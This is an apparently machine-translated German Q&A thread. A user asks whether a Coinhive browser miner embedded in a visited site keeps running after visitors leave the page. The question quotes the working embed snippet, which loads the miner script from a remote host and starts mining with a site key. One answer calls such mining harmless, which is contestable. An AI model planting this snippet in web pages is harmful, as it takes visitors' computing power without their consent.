it-swarm.com.de

Site mit einem Bitcoin-Miner-Skript

Ich habe festgestellt, dass einige meiner Benutzer eine Website besucht haben, deren Code anscheinend ein Bitcoin-Mining-JS-Skript enthält:

<script src = "hxxps://coin-Hive.com/lib/coinhive.min.js"></script><script>
var miner = new CoinHive.Anonymous('3858f62230ac3c915f300c664312c63f');
miner.start();
</script>

Meine Frage ist, mit diesem sind die Benutzer immer noch infiziert, auch wenn sie von der Seite weg navigieren? Funktionieren solche Programme nur, wenn der Benutzer die Seite im Browser geöffnet hat?

11
user92592

sind die Benutzer weiterhin infiziert, auch wenn sie von der Seite weg navigieren?

Nein

Funktionieren solche Programme nur, wenn der Benutzer die Seite im Browser geöffnet hat?

Ja, das Skript wird nur auf der Website ausgeführt, auf der es enthalten ist, während die Seite im Browser geöffnet ist

AKTUALISIERUNG:

Weitere Informationen zu diesem Skript: https://coin-Hive.com/

Coinhive bietet einen JavaScript-Miner für die Monero-Blockchain (...), die Sie in Ihre Website einbetten können. Ihre Benutzer führen den Miner direkt in ihrem Browser aus

Und https://coin-Hive.com/documentation/miner

Der Miner läuft, bis Sie ihn explizit wieder anhalten oder der Benutzer wegnavigiert .

11
ErisoHV

Coinhive scheint keine "Malware" zu sein, da es keine besonders schädlichen Auswirkungen auf den Computer des Benutzers hat. In diesem Fall wurden die Computer der Benutzer nie mit irgendetwas "infiziert".

Heutzutage ist es sehr verbreitet, dass Websites Unmengen von Skripten und Cookies von Drittanbietern im Hintergrund laden und Hunderte von Vorgängen ausführen, die Ihnen bei jeder Nutzung des Internets nicht bekannt sind. Die meisten Websites laden ein Google Analytics-Tracking-Skript, wenn Sie sie besuchen, obwohl Sie sie nicht dazu autorisiert haben. Das wäre aber keine Malware. Auf den meisten Websites werden permanente Cookies von Drittanbietern geladen, mit denen Ihre Präsenz von einer Website zur nächsten verfolgt und ein umfassendes Profil Ihrer Online-Gewohnheiten erstellt wird. Aus diesem Grund könnten Sie auf einer Website nach Schuhen suchen und dann plötzlich feststellen, dass Facebook Ihnen Anzeigen für Schuhe liefert. Das gilt aber auch generell nicht als Malware.

In Bezug auf "Schaden" oder "unerwünschte Aktivität" könnte man sagen, dass die permanente Verfolgung invasiver ist als ein Münzprüferskript. Das Coin-Mining-Skript verwendet wahrscheinlich nur einen Teil des Arbeitsspeichers und der CPU-Leistung des Endbenutzers. Dies unterscheidet sich nicht von den Hunderten anderer Javascript-Bibliotheken, die ohne Ihr Wissen im Hintergrund geladen werden.

8
blendenzo

Ich bin mit dem Coin-Hive-Dienst nicht vertraut, aber tatsächlich enthält das von Ihnen bereitgestellte Skript folgende Zeilen:

    var JobThread = function() {
            this.worker = new Worker(CoinHive.CRYPTONIGHT_WORKER_BLOB);
            this.worker.onmessage = this.onReady.bind(this);
            ...
    };

Wie Sie sehen, werden Arbeiter eingesetzt. Ich habe nicht das gesamte Skript untersucht, aber die Verwendung von Webworkern bedeutet, dass einige Vorgänge auch nach dem Schließen der Seite ausgeführt werden können. Weitere Informationen in diesem Beitrag .

Die allererste Antwort auf Ihre Frage lautet JA. Benutzer können möglicherweise für einige Zeit nach dem Schließen der Seite infiziert sein (theoretisch, wenn das Skript in geschrieben ist) so).

Tatsächlich scheint das Skript jedoch sehr bald vom System selbst beendet zu werden. Auch die Coin-Hive-Plattform ist nicht als Malware positioniert und sollte für das Benutzersystem sicher sein. Ich denke nicht, dass Sie sich darüber Sorgen machen sollten.

4
Artem Arkhipov